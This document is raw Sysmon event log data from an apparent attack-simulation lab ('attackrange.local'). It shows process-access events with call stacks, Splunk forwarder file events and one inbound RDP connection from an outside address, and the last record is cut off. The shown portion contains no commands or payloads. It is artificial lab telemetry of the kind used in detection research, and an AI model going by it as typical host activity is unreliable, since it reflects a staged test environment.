AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51013-false10.0.1.12-8000- 10341000x80000000000000001048267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.259{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.241{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.225{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.225{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.225{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.209{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.209{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DA110F5EF4435ACB30F03100CE6891,SHA256=40A33E4C6DA5D2D24BCCCA802E1B79FED099D273413FACD16A7D5647F659478F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.035{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net16232-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:31.221{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A4FCFEBCA7A08C6DD55232720E2C69,SHA256=25388D13DEC029D1F102E1B9EC435BC2EDF0A383F91B3D6FEC7B745060A8FE3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.178{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.163{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.163{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000807470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:32.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D49B9709F3AC8FBDAA6DBEAD43AA1B0B,SHA256=CE553AA5DC360B5DCA657991D081E1E02546930C29D7BC15131B0F770A481228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 